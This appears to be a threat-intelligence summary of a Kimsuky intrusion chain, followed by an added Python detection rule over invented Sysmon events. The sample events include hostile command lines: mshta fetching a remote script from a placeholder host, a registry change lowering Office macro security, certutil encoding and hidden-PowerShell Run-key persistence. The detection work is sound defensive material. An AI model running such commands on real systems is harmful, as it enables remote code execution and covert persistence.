Operation KimsuKEE (Kimsuky Eternal Evolution)

2019-05-10 Igloo

https://www.igloo.co.kr/security-information/operation-kimsukeekimsuky-eternal-evolution/

Igloo analyzes Operation KimsuKEE as an evolved Kimsuky intrusion chain that still begins with an HWP document exploiting PostScript execution to load shellcode. The newer sample differs from earlier Kimsuky tradecraft by abusing the legitimate mshta.exe process, chaining multiple malware distribution URLs, and delivering fileless VBA and PowerShell scripts instead of relying mainly on Win32 API-based droppers or downloaders. The infection flow disables Word and Excel macro security settings, collects system and recent-file information with shell commands, Base64-encodes the results with certutil, and establishes persistence through a registry PowerShell command. The final payload, driving.ps1, is described as a fileless PowerShell keylogger, with related distribution and upload URLs under jmable.mireene.com and several hashes provided for detection. The report matters because it shows Kimsuky adapting toward script-heavy, fileless execution while retaining HWP exploitation and keylogging behavior that defenders can monitor.
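The infection flow summarized above leaves a recognizable trail in process-creation telemetry: mshta.exe pulling a remote script, a registry write that lowers Office macro security, certutil used to Base64-encode collected data, and a PowerShell command placed under a Run key. The detection logic below is an added example, not code from the Igloo report or from the sample it analyzes; it runs over constructed Sysmon-style events and assumes the macro-security change is made through the Office VBAWarnings registry value and that the HWP viewer process is named Hwp.exe, neither of which the page states.

```python
import re

# Constructed Sysmon-style process-creation events (invented for this example,
# not indicators from the report): (parent_image, image, command_line).
SAMPLE_EVENTS = [
    ("Hwp.exe", "mshta.exe", "mshta.exe http://distribution-host.invalid/shop/a.hta"),
    ("mshta.exe", "cmd.exe",
     r'cmd /c reg add HKCU\Software\Microsoft\Office\16.0\Word\Security /v VBAWarnings /t REG_DWORD /d 1 /f'),
    ("cmd.exe", "certutil.exe",
     r"certutil -encode C:\Users\u\AppData\Local\Temp\info.txt C:\Users\u\AppData\Local\Temp\info.enc"),
    ("cmd.exe", "reg.exe",
     r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /t REG_SZ '
     r'/d "powershell -w hidden -File C:\Users\u\AppData\Local\driving.ps1" /f'),
    ("explorer.exe", "notepad.exe", r"notepad.exe C:\Users\u\notes.txt"),  # benign noise
]

# Document viewers that should not normally spawn a script host (Hwp.exe is an assumed name).
DOC_HOSTS = {"hwp.exe", "winword.exe", "excel.exe"}

# One (name, predicate) pair per stage of the chain described in the report.
STAGES = [
    ("mshta_remote_script", lambda p, i, c: i.lower() == "mshta.exe"
        and (p.lower() in DOC_HOSTS or re.search(r"https?://", c, re.I))),
    # Office macro security stored under ...\Office\<ver>\<app>\Security\VBAWarnings (assumed value).
    ("office_macro_security_change", lambda p, i, c:
        re.search(r"\\office\\.*\\security", c, re.I) and "vbawarnings" in c.lower()),
    ("certutil_base64_encode", lambda p, i, c: i.lower() == "certutil.exe"
        and re.search(r"\s-encode(hex)?\b", c, re.I)),
    ("run_key_powershell_persistence", lambda p, i, c:
        re.search(r"\\currentversion\\run\b", c, re.I) and "powershell" in c.lower()),
]

def match_stages(events):
    """Return the ordered list of distinct chain stages observed in the events."""
    seen = []
    for parent, image, cmdline in events:
        for name, pred in STAGES:
            if name not in seen and pred(parent, image, cmdline):
                seen.append(name)
    return seen

def assess(events, threshold=3):
    """Raise an alert when at least `threshold` distinct stages appear on one host.

    Any single stage has benign uses; the combination is what matches the reported chain."""
    stages = match_stages(events)
    return {"alert": len(stages) >= threshold, "stages": stages}
```

Grouping events per host before calling assess() keeps unrelated machines from being correlated into one alert.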

Indicators of Compromise
